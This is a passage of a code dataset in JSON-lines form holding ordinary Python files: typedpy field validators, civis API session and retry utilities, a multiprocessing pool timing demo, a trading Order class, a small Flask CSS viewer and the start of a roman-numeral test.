{}\".format(err_prefix(), self.minLength)\n )\n if self.pattern is not None and not self._compiled_pattern.match(value):\n raise ValueError(\n '{}Does not match regular expression: \"{}\"'.format(\n err_prefix(), self.pattern\n )\n )\n\n def __set__(self, instance, value):\n self._validate(value)\n super().__set__(instance, value)\n\n\nclass Function(Field):\n \"\"\"\n A function. Note that this can't be any callable (it can't be a class, for example), but a real function\n \"\"\"\n\n def __set__(self, instance, value):\n def is_function(f):\n return type(f) == type(lambda x:x) or type(f) == type(open)\n\n def err_prefix():\n return (\n \"{}: Got {}; \".format(self._name, wrap_val(value)) if self._name else \"\"\n )\n\n if not is_function(value):\n raise TypeError(\"{}Expected a function\".format(err_prefix()))\n super().__set__(instance, value)\n\n\nclass Anything(Field):\n \"\"\"\n A field that can contain anything (similar to \"any\" in Typescript).\n Example:\n\n .. code-block:: python\n\n class Foo(Structure):\n i = Integer\n some_content = Anything\n\n # now we can assign anything to some_content property:\n Foo(i=5, some_content = \"whatever\")\n Foo(i=5, some_content = [1,2,3])\n Foo(i=5, some_content = Bar())\n\n \"\"\"\n\n pass\n\n\nclass Float(TypedField, Number):\n \"\"\"\n An extension of :class:`Number` for a float\n \"\"\"\n\n _ty = float\n\n def _validate(self, value):\n super()._validate(value)\n Number._validate_static(self, value)\n\n\nclass Boolean(TypedField):\n \"\"\"\n Value of type bool. True or False.\n \"\"\"\n\n _ty = bool\n\n\nclass Positive(Number):\n \"\"\"\n An extension of :class:`Number`. 
Requires the number to be positive\n \"\"\"\n\n def __set__(self, instance, value):\n if value <= 0:\n raise ValueError(\"{}: Must be positive\".format(self._name))\n super().__set__(instance, value)\n\n\nclass PositiveFloat(Float, Positive):\n \"\"\"\n An combination of :class:`Float` and :class:`Positive`\n \"\"\"\n\n pass\n\n\nclass PositiveInt(Integer, Positive):\n \"\"\"\n An combination of :class:`Integer` and :class:`Positive`\n \"\"\"\n\n pass\n\n\nclass _ListStruct(list):\n \"\"\"\n This is a useful wrapper for the content of list in an Array field.\n It ensures that an update of the form:\n mystruct.my_array[i] = new_val\n Will not bypass the validation of the Array.\n \"\"\"\n\n def __init__(self, array: Field, struct_instance: Structure, mylist):\n self._field_definition = array\n self._instance = struct_instance\n super().__init__(mylist)\n\n def __setitem__(self, key, value):\n copied = self[:]\n copied.__setitem__(key, value)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n\n def append(self, value):\n copied = self[:]\n copied.append(value)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n super().append(value)\n\n def extend(self, value):\n copied = self[:]\n copied.extend(value)\n if getattr(self, \"_instance\", None):\n setattr(\n self._instance, getattr(self._field_definition, \"_name\", None), copied\n )\n\n def insert(self, index: int, value):\n copied = self[:]\n copied.insert(index, value)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n\n def remove(self, ind):\n copied = self[:]\n copied.remove(ind)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n\n def pop(self, index: int = -1):\n copied = self[:]\n res = copied.pop(index)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n return res\n\n def __getstate__(self):\n return {\n \"the_instance\": self._instance,\n \"the_array\": self._field_definition,\n \"the_values\": self[:],\n }\n\n def __deepcopy__(self, memo={}):\n vals = [deepcopy(v) for v in self[:]]\n return _ListStruct(\n array=deepcopy(self._field_definition),\n struct_instance=memo[id(self._instance)],\n mylist=vals,\n )\n\n def __setstate__(self, state):\n self._field_definition = state[\"the_array\"]\n self._instance = state[\"the_instance\"]\n super().__init__(state[\"the_values\"])\n\n\nclass _DictStruct(dict):\n \"\"\"\n This is a useful wrapper for the content of dict in an Map field.\n It ensures that an update of the form:\n mystruct.my_map[i] = new_val, or\n mystruct.my_map.update(some_dict)\n\n ...will not bypass the validation of the Map.\n \"\"\"\n\n def __init__(self, the_map, struct_instance, mydict):\n self._field_definition = the_map\n self._instance = struct_instance\n super().__init__(mydict)\n\n def __setitem__(self, key, value):\n copied = self.copy()\n copied.__setitem__(key, value)\n if getattr(self, \"_instance\", None):\n setattr(\n self._instance, getattr(self._field_definition, \"_name\", None), copied\n )\n super().__setitem__(key, value)\n\n def __delitem__(self, key):\n copied = self.copy()\n del copied[key]\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n\n def update(self, *args, **kwargs):\n copied = self.copy()\n res = copied.update(*args, **kwargs)\n setattr(self._instance, getattr(self._field_definition, \"_name\", None), copied)\n return res\n\n def __getstate__(self):\n return {\n \"_instance\": 
self._instance,\n \"_map\": self._field_definition,\n \"mydict\": self.copy(),\n }\n\n def __setstate__(self, state):\n self._field_definition = state[\"_map\"]\n self._instance = state[\"_instance\"]\n super().__init__(state[\"mydict\"])\n\n\nclass _CollectionMeta(type):\n def __getitem__(cls, item):\n def validate_and_get_field(val):\n if isinstance(val, Field):\n return val\n elif Field in getattr(val, \"__mro__\", {}):\n return val()\n elif Structure in getattr(val, \"__mro__\", {}):\n return ClassReference(val)\n elif is_function_returning_field(val):\n return val()\n else:\n raise TypeError(\"Expected a Field class or instance\")\n\n if isinstance(item, tuple):\n items = [validate_and_get_field(it) for it in item]\n return cls(items=items)\n return cls(items=validate_and_get_field(item))\n\n\nclass _EnumMeta(type):\n def __getitem__(cls, values):\n if isinstance(values, (type,)) and issubclass(values, (enum.Enum,)):\n return cls(values=values)\n return cls(values=list(values))\n\n\nclass _JSONSchemaDraft4ReuseMeta(type):\n def __getitem__(cls, item):\n def validate_and_get_field(val):\n if isinstance(val, Field):\n return val\n elif Field in getattr(val, \"__mro__\", {}):\n return val()\n elif Structure in getattr(val, \"__mro__\", {}):\n return ClassReference(val)\n elif is_function_returning_field(val):\n return val()\n else:\n raise TypeError(\"Expected a Field class or instance\")\n\n if isinstance(item, tuple):\n fields = [validate_and_get_field(it) for it in item]\n return cls(fields)\n return cls([validate_and_get_field(item)])\n\n\nclass SizedCollection(object):\n def __init__(self, *args, minItems=None, maxItems=None, **kwargs):\n self.minItems = minItems\n self.maxItems = maxItems\n super().__init__(*args, **kwargs)\n\n def validate_size(self, items, name):\n if self.minItems is not None and len(items) < self.minItems:\n raise ValueError(\n \"{}: Expected length of at least {}\".format(name, self.minItems)\n )\n if self.maxItems is not None and len(items) > self.maxItems:\n raise ValueError(\n \"{}: Expected length of at most {}\".format(name, self.maxItems)\n )\n\n\nclass Set(SizedCollection, TypedField, metaclass=_CollectionMeta):\n \"\"\"\n A set collection. Accepts input of type `set`\n\n Arguments:\n minItems(int): optional\n minimal size\n maxItems(int): optional\n maximal size\n items(:class:`Field` or :class:`Structure`): optional\n The type of the content, can be a predefined :class:`Structure` or\n :class:`Field`\n\n Examples:\n\n .. 
code-block:: python\n\n Set[String]\n Set(items=Integer(maximum=10), maxItems = 10)\n\n # let's assume we defined a Structure 'Person', then we can use it too:\n Set[Person]\n\n\n \"\"\"\n\n _ty = set\n\n def __init__(self, *args, items=None, **kwargs):\n self.items = _map_to_field(items)\n\n if isinstance(self.items, TypedField) and not getattr(\n getattr(self.items, \"_ty\"), \"__hash__\"\n ):\n raise TypeError(\n \"Set element of type {} is not hashable\".format(\n getattr(self.items, \"_ty\")\n )\n )\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n if not isinstance(value, set):\n raise TypeError(\n \"{}: Got {}; Expected {}\".format(self._name, wrap_val(value), set)\n )\n self.validate_size(value, self._name)\n if self.items is not None:\n temp_st = Structure()\n setattr(self.items, \"_name\", self._name)\n res = set()\n for val in value:\n self.items.__set__(temp_st, val)\n res.add(getattr(temp_st, getattr(self.items, \"_name\")))\n value = res\n super().__set__(instance, value)\n\n\nclass Map(SizedCollection, TypedField, metaclass=_CollectionMeta):\n \"\"\"\n A map/dictionary collection. Accepts input of type `dict`\n\n Arguments:\n minItems(int): optional\n minimal size\n maxItems(int): optional\n maximal size\n items(tuple of 2 :class:`Field` or :class:`Structure` elements): optional\n The first element is the Field for keys, the second is for values.\n Examples:\n\n .. code-block:: python\n\n age_by_name = Map[String, PositiveInt]\n # Let's assume we defined a Structure \"Person\"\n person_by_id = Map[String, Person]\n # even Structure reference is supported for keys!\n id_by_person = Map[Person, String]\n id_by_person = Map[Person, String]\n\n \"\"\"\n\n _ty = dict\n\n def __init__(self, *args, items=None, **kwargs):\n if items is not None and (\n not isinstance(items, (tuple, list)) or len(items) != 2\n ):\n raise TypeError(\"items is expected to be a list/tuple of two fields\")\n if items is None:\n self.items = None\n else:\n self.items = []\n for item in items:\n self.items.append(_map_to_field(item))\n key_field = self.items[0]\n if isinstance(key_field, TypedField) and not getattr(\n getattr(key_field, \"_ty\"), \"__hash__\"\n ):\n raise TypeError(\n \"Key field of type {}, with underlying type of {} is not hashable\".format(\n key_field, getattr(key_field, \"_ty\")\n )\n )\n self._custom_deep_copy_implementation = True\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n if not isinstance(value, dict):\n raise TypeError(\"%s: Expected %s\" % (self._name, dict))\n self.validate_size(value, self._name)\n\n if self.items is not None:\n temp_st = Structure()\n key_field, value_field = self.items[0], self.items[1]\n setattr(key_field, \"_name\", self._name + \"_key\")\n setattr(value_field, \"_name\", self._name + \"_value\")\n res = OrderedDict()\n\n for key, val in value.items():\n key_field.__set__(temp_st, key)\n value_field.__set__(temp_st, val)\n res[getattr(temp_st, getattr(key_field, \"_name\"))] = getattr(\n temp_st, getattr(value_field, \"_name\")\n )\n value = res\n super().__set__(instance, _DictStruct(self, instance, value))\n\n\nclass Array(SizedCollection, TypedField, metaclass=_CollectionMeta):\n \"\"\"\n An Array field, similar to a list. 
Supports the properties in JSON schema draft 4.\n Expected input is of type `list`.\n\n Arguments:\n minItems(int): optional\n minimal size\n maxItems(int): optional\n maximal size\n unqieItems(bool): optional\n are elements required to be unique?\n additionalItems(bool): optional\n Relevant in case items parameter is a list of Fields. Is it allowed to have additional\n elements beyond the ones defined in \"items\"?\n items(a :class:`Field` or :class:`Structure`, or a list/tuple of :class:`Field` or :class:`Structure`): optional\n Describes the fields of the elements.\n If a items if a :class:`Field`, then it applies to all items.\n If a items is a list, then every element in the content is expected to be\n of the corresponding field in items.\n Examples:\n\n .. code-block:: python\n\n names = Array[String]\n names = Array[String(minLengh=3)]\n names = Array(minItems=5, items=String)\n my_record = Array(items=[String, Integer(minimum=5), String])\n my_lists = Array[Array[Integer]]\n my_structs = Array[StructureReference(a=Integer, b=Float)]\n # Let's say we defined a Structure \"Person\"\n people = Array[Person]\n\n \"\"\"\n\n _ty = list\n\n def __init__(\n self, *args, items=None, uniqueItems=None, additionalItems=None, **kwargs\n ):\n \"\"\"\n Constructor\n :param args: pass-through\n :param items: either a single field, which will be enforced for all elements, or a list\n of fields which enforce the elements with the correspondent index\n :param uniqueItems: are elements required to be unique?\n :param additionalItems: Relevant if \"items\" is a list. Is it allowed to have additional\n elements beyond the ones defined in \"items\"?\n :param kwargs: pass-through\n \"\"\"\n self.uniqueItems = uniqueItems\n self.additionalItems = additionalItems\n if isinstance(items, list):\n self.items = []\n for item in items:\n self.items.append(_map_to_field(item))\n else:\n self.items = _map_to_field(items)\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n verify_type_and_uniqueness(list, value, self._name, self.uniqueItems)\n self.validate_size(value, self._name)\n if self.items is not None:\n if isinstance(self.items, Field):\n temp_st = Structure()\n setattr(self.items, \"_name\", self._name)\n res = []\n for i, val in enumerate(value):\n setattr(self.items, \"_name\", self._name + \"_{}\".format(str(i)))\n self.items.__set__(temp_st, val)\n res.append(getattr(temp_st, getattr(self.items, \"_name\")))\n value = res\n elif isinstance(self.items, list):\n additional_properties_forbidden = self.additionalItems is False\n\n if not getattr(instance, \"_skip_validation\", False):\n if len(self.items) > len(value) or (\n additional_properties_forbidden and len(self.items) > len(value)\n ):\n raise ValueError(\n \"{}: Got {}; Expected an array of length {}\".format(\n self._name, value, len(self.items)\n )\n )\n temp_st = Structure()\n temp_st._skip_validation = getattr(instance, \"_skip_validation\", False)\n res = []\n for ind, item in enumerate(self.items):\n if ind >= len(value):\n continue\n setattr(item, \"_name\", self._name + \"_{}\".format(str(ind)))\n item.__set__(temp_st, value[ind])\n res.append(getattr(temp_st, getattr(item, \"_name\")))\n res += value[len(self.items) :]\n value = res\n\n super().__set__(instance, _ListStruct(self, instance, value))\n\n\ndef verify_type_and_uniqueness(the_type, value, name, has_unique_items):\n if not isinstance(value, the_type):\n raise TypeError(\n \"{}: Got {}; Expected {}\".format(name, wrap_val(value), str(the_type))\n )\n if 
has_unique_items:\n unique = reduce(\n lambda unique_vals, x: unique_vals.append(x) or unique_vals\n if x not in unique_vals\n else unique_vals,\n value,\n [],\n )\n if len(unique) < len(value):\n raise ValueError(\n \"{}: Got {}; Expected unique items\".format(name, wrap_val(value))\n )\n\n\nclass Tuple(TypedField, metaclass=_CollectionMeta):\n \"\"\"\n A tuple field, supports unique items option.\n Expected input is of type `tuple`.\n\n Arguments:\n\n unqieItems(`bool`): optional\n are elements required to be unique?\n\n items(`list`/`tuple` of :class:`Field` or :class:`Structure`): optional\n Describes the fields of the elements.\n Every element in the content is expected to be\n of the corresponding :class:`Field` in items.\n\n\n Examples:\n\n .. code-block:: python\n\n // a is a tuple of exactly 2 strings that are different from each other.\n a = Tuple(uniqueItems=True, items = [String, String])\n\n // b is a tuple of 3: string, string and a number up to 10.\n b = Tuple(items = [String, String, Number(maximum=10)])\n\n // c is a tuple of 3: integer, string, float.\n c = Tuple[Integer, String, Float]\n\n // The following define a tuple of any number of Integers\n d = Tuple[Integer]\n\n // It can also contain other structures:\n // Assume we have something like: class Foo(Structure): pass\n // e is a tuple of any number of Integers or Foo instances\n e = Tuple[AnyOf[Integer, Foo]]\n\n \"\"\"\n\n _ty = tuple\n\n def __init__(self, *args, items, uniqueItems=None, **kwargs):\n \"\"\"\n Constructor\n :param args: pass-through\n :param items: either a single field, which will be enforced for all elements, or a list\n of fields which enforce the elements with the correspondent index\n :param uniqueItems: are elements required to be unique?\n :param kwargs: pass-through\n \"\"\"\n self.uniqueItems = uniqueItems\n if isinstance(items, (list, tuple)):\n self.items = []\n for item in items:\n if isinstance(item, Field):\n self.items.append(item)\n elif Field in item.__mro__:\n self.items.append(item())\n else:\n raise TypeError(\"Expected a Field class or instance\")\n elif isinstance(items, (Field,)) or Field in items.__mro__:\n self.items = [items]\n else:\n raise TypeError(\"Expected a list/tuple of Fields or a single Field\")\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n verify_type_and_uniqueness(tuple, value, self._name, self.uniqueItems)\n if len(self.items) != len(value) and len(self.items) > 1:\n raise ValueError(\n \"{}: Got {}; Expected a tuple of length {}\".format(\n self._name, wrap_val(value), len(self.items)\n )\n )\n\n temp_st = Structure()\n res = []\n items = self.items if len(self.items) > 1 else self.items * len(value)\n for ind, item in enumerate(items):\n setattr(item, \"_name\", self._name + \"_{}\".format(str(ind)))\n item.__set__(temp_st, value[ind])\n res.append(getattr(temp_st, getattr(item, \"_name\")))\n res += value[len(items) :]\n value = tuple(res)\n\n super().__set__(instance, value)\n\n\nclass Enum(Field, metaclass=_EnumMeta):\n \"\"\"\n Enum field. value can be one of predefined values\n\n Arguments:\n values(`list` or `set` or `tuple`, alternatively an enum Type):\n allowed values. Can be of any type.\n Alternatively, can be an enum.Enum type. See example below.\n When defined with an enum.Enum, serialization converts to strings,\n while deserialization expects strings.\n Examples:\n\n .. 
code-block:: python\n\n class Values(enum.Enum):\n ABC = enum.auto()\n DEF = enum.auto()\n GHI = enum.auto()\n\n class Example(Structure):\n arr = Array[Enum[Values]]\n e = Enum['abc', 'x', 'def', 3]\n\n example = Example(arr=[Values.ABC, 'DEF'],e=3)\n assert example.arr = [Values.ABC, Values.DEF]\n\n # deserialization example:\n deserialized = Deserializer(target_class=Example).deserialize({'arr': ['GHI', 'DEF', 'ABC'], 'e': 3})\n assert deserialized.arr == [Values.GHI, Values.DEF, Values.ABC]\n \"\"\"\n\n def __init__(self, *args, values, **kwargs):\n self._is_enum = isinstance(values, (type,)) and issubclass(values, enum.Enum)\n if self._is_enum:\n self._enum_class = values\n self.values = list(values)\n else:\n self.values = values\n super().__init__(*args, **kwargs)\n\n def _validate(self, value):\n if self._is_enum:\n enum_names = {v.name for v in self._enum_class}\n if value not in enum_names and not isinstance(value, (self._enum_class,)):\n raise ValueError(\n \"{}: Must be a value of {}\".format(self._name, self._enum_class)\n )\n\n elif value not in self.values:\n raise ValueError(\"{}: Must be one of {}\".format(self._name, self.values))\n\n def __set__(self, instance, value):\n self._validate(value)\n if self._is_enum:\n if isinstance(value, (str,)):\n value = self._enum_class[value]\n super().__set__(instance, value)\n\n\nclass EnumString(Enum, String):\n \"\"\"\n Combination of :class:`Enum` and :class:`String`. This is useful if you want to further\n limit your allowable enum values, using :class:`String` attributes, such as pattern, maxLength.\n\n Example:\n\n .. code-block:: python\n\n predefined_list = ['abc', 'x', 'def', 'yy']\n\n EnumString(values=predefined_list, minLength=3)\n\n \"\"\"\n\n pass\n\n\nclass Sized(Field):\n \"\"\"\n The length of the value is limited to be at most the maximum given.\n The value can be any iterable.\n\n Arguments:\n\n maxlen(`int`):\n maximum length\n\n \"\"\"\n\n def __init__(self, *args, maxlen, **kwargs):\n self.maxlen = maxlen\n super().__init__(*args, **kwargs)\n\n def __set__(self, instance, value):\n if len(value) > self.maxlen:\n raise ValueError(\"{}: Too long\".format(self._name))\n super().__set__(instance, value)\n\n\nclass SizedString(String, Sized):\n pass\n\n\ndef _str_for_multioption_field(instance):\n name = instance.__class__.__name__\n if instance.get_fields():\n fields_st = \", \".join([str(field) for field in instance.get_fields()])\n propst = \" [{}]\".format(fields_st)\n else:\n propst = \"\"\n return \"<{}{}>\".format(name, propst)\n\n\nclass MultiFieldWrapper(object):\n \"\"\"\n An abstract base class for AllOf, AnyOf, OneOf, etc.\n It provides flexibility in reading the \"fields\" argument.\n \"\"\"\n\n def __init__(self, *arg, fields, **kwargs):\n if isinstance(fields, list):\n self._fields = []\n for item in fields:\n self._fields.append(_map_to_field(item))\n else:\n raise TypeError(\"Expected a Field class or instance\")\n super().__init__(*arg, **kwargs)\n\n def get_fields(self):\n return self._fields\n\n\nclass AllOf(MultiFieldWrapper, Field, metaclass=_JSONSchemaDraft4ReuseMeta):\n \"\"\"\n Content must adhere to all requirements in the fields arguments.\n Arguments:\n\n fields( `list` of :class:`Field`): optional\n the content should match all of the fields in the list\n\n Example:\n\n .. 
code-block:: python\n\n AllOf[Number(maximum=20, minimum=-10), Integer, Positive]\n\n \"\"\"\n\n def __init__(self, fields):\n super().__init__(fields=fields)\n\n def __set__(self, instance, value):\n for field in self.get_fields():\n setattr(field, \"_name\", self._name)\n field.__set__(instance, value)\n super().__set__(instance, value)\n\n def __str__(self):\n return _str_for_multioption_field(self)\n\n\nclass AnyOf(MultiFieldWrapper, Field, metaclass=_JSONSchemaDraft4ReuseMeta):\n \"\"\"\n Content must adhere to one or more of the requirements in the fields arguments.\n Arguments:\n\n fields( `list` of :class:`Field`): optional\n the content should match at least one of the fields in the list\n\n Example:\n\n .. code-block:: python\n\n AnyOf[Number(maximum=20, minimum=-10), Integer, Positive, String]\n\n \"\"\"\n\n def __init__(self, fields):\n super().__init__(fields=fields)\n\n def __set__(self, instance, value):\n matched = False\n for field in self.get_fields():\n setattr(field, \"_name\", self._name)\n try:\n field.__set__(instance, value)\n matched = True\n except TypeError:\n pass\n except ValueError:\n pass\n if not matched:\n raise ValueError(\n \"{}: {} Did not match any field option\".format(\n self._name, wrap_val(value)\n )\n )\n super().__set__(instance, value)\n\n def __str__(self):\n return _str_for_multioption_field(self)\n\n\nclass OneOf(MultiFieldWrapper, Field, metaclass=_JSONSchemaDraft4ReuseMeta):\n \"\"\"\n Content must adhere to one, and only one, of the requirements in the fields arguments.\n Arguments:\n\n fields( `list` of :class:`Field`): optional\n the content should match one, and only one, of the fields in the list\n\n Example:\n\n .. code-block:: python\n\n OneOf[Number(maximum=20, minimum=-10), Integer, Positive, String]\n\n \"\"\"\n\n def __init__(self, fields):\n super().__init__(fields=fields)\n\n def __set__(self, instance, value):\n matched = 0\n for field in self.get_fields():\n setattr(field, \"_name\", self._name)\n try:\n field.__set__(instance, value)\n matched += 1\n except TypeError:\n pass\n except ValueError:\n pass\n if not matched:\n raise ValueError(\n \"{}: Got {}; Did not match any field option\".format(self._name, value)\n )\n if matched > 1:\n raise ValueError(\n \"{}: Got {}; Matched more than one field option\".format(\n self._name, value\n )\n )\n super().__set__(instance, value)\n\n def __str__(self):\n return _str_for_multioption_field(self)\n\n\nclass NotField(MultiFieldWrapper, Field, metaclass=_JSONSchemaDraft4ReuseMeta):\n \"\"\"\n Content *must not* adhere to any of the requirements in the fields arguments.\n Arguments:\n\n fields( `list` of :class:`Field`): optional\n the content must not match any of the fields in the lists\n\n Examples:\n\n .. 
code-block:: python\n\n NotField([Number(multiplesOf=5, maximum=20, minimum=-10), String])\n NotField[Positive]\n\n \"\"\"\n\n def __init__(self, fields):\n super().__init__(fields=fields)\n\n def __set__(self, instance, value):\n for field in self.get_fields():\n setattr(field, \"_name\", self._name)\n try:\n field.__set__(instance, value)\n except TypeError:\n pass\n except ValueError:\n pass\n else:\n raise ValueError(\n \"{}: Got {}; Expected not to match any field definition\".format(\n self._name, wrap_val(value)\n )\n )\n super().__set__(instance, value)\n\n def __str__(self):\n return _str_for_multioption_field(self)\n\n\nclass ValidatedTypedField(TypedField):\n def __set__(self, instance, value):\n self._validate_func(value) # pylint: disable=E1101\n super().__set__(instance, value)\n\n\ndef create_typed_field(classname, cls, validate_func=None):\n \"\"\"\n Factory that generates a new class for a :class:`Field` as a wrapper of any class.\n Example:\n Given a class Foo, and a validation function for the value in Foo - validate_foo, the line\n\n .. code-block:: python\n\n ValidatedFooField = create_typed_field(\"FooField\", Foo, validate_func=validate_foo)\n\n Generates a new :class:`Field` class that validates the content using validate_foo, and can be\n used just like any :class:`Field` type.\n\n .. code-block:: python\n\n class A(Structure):\n foo = ValidatedFooField\n bar = Integer\n\n # asumming we have an instance of Foo, called my_foo:\n A(bar=4, foo=my_foo)\n\n Arguments:\n\n classname(`str`):\n the content must not match any of the fields in the lists\n \"\"\"\n\n def validate_wrapper(cls, value):\n if validate_func is None:\n return\n validate_func(value)\n\n return type(\n classname,\n (ValidatedTypedField,),\n {\"_validate_func\": validate_wrapper, \"_ty\": cls},\n )\n\n\nclass SerializableField(ABC):\n \"\"\"\n An abstract class for a field that has custom serialization or deserialization.\n can override the method:\n serialize(self, value),\n deserialize(self, value)\n\n These methods are not being used for pickling.\n \"\"\"\n\n def serialize(self, value):\n return value\n\n def deserialize(self, value):\n return value\n\n\nclass ExceptionField(TypedField, SerializableField):\n \"\"\"\n As Exception. 
This is serialized as the string representation of the exception.\n It does not support deserialization.\n \"\"\"\n\n _ty = Exception\n\n def serialize(self, value):\n return str(value)\n","sub_path":"typedpy/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":38891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"467113633","text":"from builtins import super\nimport logging\nimport os\nimport re\nimport sys\nimport time\nimport uuid\n\nimport requests\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util import Retry\n\nimport civis\n\n\nlog = logging.getLogger(__name__)\nUNDERSCORER1 = re.compile(r'(.)([A-Z][a-z]+)')\nUNDERSCORER2 = re.compile('([a-z0-9])([A-Z])')\n\n\ndef maybe_get_random_name(name):\n if not name:\n name = uuid.uuid4().hex\n return name\n\n\ndef camel_to_snake(word):\n # https://gist.github.com/jaytaylor/3660565\n word = UNDERSCORER1.sub(r'\\1_\\2', word)\n return UNDERSCORER2.sub(r'\\1_\\2', word).lower()\n\n\ndef to_camelcase(s):\n return re.sub(r'(^|_)([a-zA-Z])', lambda m: m.group(2).upper(), s)\n\n\ndef get_api_key(api_key):\n \"\"\"Pass-through if `api_key` is not None otherwise tries the CIVIS_API_KEY\n environmental variable.\n \"\"\"\n if api_key is not None: # always prefer user given one\n return api_key\n api_key = os.environ.get(\"CIVIS_API_KEY\", None)\n if api_key is None:\n raise EnvironmentError(\"No Civis API key found. Please store in \"\n \"CIVIS_API_KEY environment variable\")\n return api_key\n\n\ndef open_session(api_key, max_retries=5, user_agent=\"civis-python\"):\n \"\"\"Create a new Session which can connect with the Civis API\"\"\"\n civis_version = civis.__version__\n session = requests.Session()\n session.auth = (api_key, '')\n session_agent = session.headers.get('User-Agent', '')\n ver_string = \"{}.{}.{}\".format(sys.version_info.major,\n sys.version_info.minor,\n sys.version_info.micro)\n user_agent = \"{}/Python v{} Civis v{} {}\".format(\n user_agent, ver_string, civis_version, session_agent)\n session.headers.update({\"User-Agent\": user_agent.strip()})\n max_retries = AggressiveRetry(max_retries, backoff_factor=.75,\n status_forcelist=civis.civis.RETRY_CODES)\n adapter = HTTPAdapter(max_retries=max_retries)\n session.mount(\"https://\", adapter)\n\n return session\n\n\nclass AggressiveRetry(Retry):\n # Subclass Retry so that it retries more things. In particular,\n # always retry API requests with a Retry-After header, regardless\n # of the verb.\n def is_retry(self, method, status_code, has_retry_after=False):\n \"\"\" Is this method/status code retryable? 
(Based on whitelists and control\n variables such as the number of total retries to allow, whether to\n respect the Retry-After header, whether this header is present, and\n whether the returned status code is on the list of status codes to\n be retried upon on the presence of the aforementioned header)\n \"\"\"\n if (self.total and\n self.respect_retry_after_header and\n has_retry_after and\n (status_code in self.RETRY_AFTER_STATUS_CODES)):\n return True\n\n else:\n return super().is_retry(method=method, status_code=status_code,\n has_retry_after=has_retry_after)\n\n\ndef retry(exceptions, retries=5, delay=0.5, backoff=2):\n \"\"\"\n Retry decorator\n\n Parameters\n ----------\n exceptions: Exception\n exceptions to trigger retry\n retries: int, optional\n number of retries to perform\n delay: float, optional\n delay before next retry\n backoff: int, optional\n factor used to increase delay after each retry\n\n Returns\n -------\n retry decorator\n\n Raises\n ------\n exception raised by decorator function\n \"\"\"\n def deco_retry(f):\n def f_retry(*args, **kwargs):\n n_failed = 0\n new_delay = delay\n while True:\n try:\n return f(*args, **kwargs)\n except exceptions as exc:\n if n_failed < retries:\n n_failed += 1\n msg = \"%s, Retrying in %d seconds...\" % \\\n (str(exc), new_delay)\n log.debug(msg)\n time.sleep(new_delay)\n new_delay *= backoff\n else:\n raise exc\n\n return f_retry\n\n return deco_retry\n\n\nclass BufferedPartialReader(object):\n def __init__(self, buf, max_bytes):\n self.buf = buf\n self.max_bytes = max_bytes\n self.bytes_read = 0\n self.len = max_bytes\n\n def read(self, size=-1):\n if self.bytes_read >= self.max_bytes:\n return b''\n bytes_left = self.max_bytes - self.bytes_read\n if size < 0:\n bytes_to_read = bytes_left\n else:\n bytes_to_read = min(size, bytes_left)\n data = self.buf.read(bytes_to_read)\n self.bytes_read += len(data)\n return data\n","sub_path":"civis/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"254945983","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/1/25 20:24\n# @Author : xxx\n# @Email : xxx@admin.com\n# @File : 14.进程池.py\n# @Software: PyCharm\n\n# 四台机器\n# 10000个螺丝钉的任务\n# 人的工作 :把原料扔机器里\n\n# 如果我们有多少个任务 就开启多少个进程 实际上对我们来说 是不划算的\n# 由于我们计算机的cpu个数是非常有限的\n# 所以我们起的进程数量是完全和CPU个数成比例的\nimport os\nimport time\nfrom multiprocessing import Pool,Process\n\ndef func(i):\n print(i,os.getpid())\n\nif __name__ == '__main__':\n start = time.time()\n p_lst = []\n for i in range(100):\n p = Process(target=func,args = (i,))\n p.start()\n p_lst.append(p)\n for p in p_lst:\n p.join()\n end = time.time()\n pro_time = end-start\n start = time.time()\n p = Pool(4)\n for i in range(100):\n p.apply_async(func,args=(i,)) # async异步的提交任务\n p.close() # 关闭池子,不是要回收池子中的进程,而是阻止继续向池子中提交任务\n p.join() # 阻塞,直到池子中的任务都执行完毕\n end = time.time()\n pool_time = end - start\n print(pro_time,pool_time)\n\n\n\n\n\n","sub_path":"day27/15.进程池和多进程的性能测试.py","file_name":"15.进程池和多进程的性能测试.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"126998108","text":"class Order(object):\n def __init__(self, party, action, size, oType, price=None):\n # party: party placing the trade\n # action: BUY or SELL\n # size: quantity of shares specified in order\n # oType: market or limit\n # price: needed for limit orders\n self.party = party\n self.action = action\n self.size = 
size\n self.type = oType\n self.price = price\n","sub_path":"src/Order.py","file_name":"Order.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125138796","text":"from flask import Flask, render_template\nimport cssutils\n\napp = Flask(__name__)\n\ndef get_css_properties(css_file='static/style.css'):\n with open(css_file, 'r') as css_file:\n css = css_file.read()\n sheet = cssutils.parseString(css)\n return {rule.selectorText: dict(rule.style) for rule in sheet}\n\n\n@app.route('/')\ndef index():\n css_props = get_css_properties()\n return render_template('index.html', css_props=css_props)\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=5005)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"448311232","text":"\"\"\"\nunittest: python unit test functionality\nrnnmb: main method\nromnum_parser: functions which turn roman numerals into numeric values.\nint_parser: function to turn numeric values into roman numerals.\n\"\"\"\nimport unittest as test\n\n# import rnnmb as rn\nimport romnum_parser as rp\nimport int_parser as ip\n\n\nclass TestMethods(test.TestCase):\n 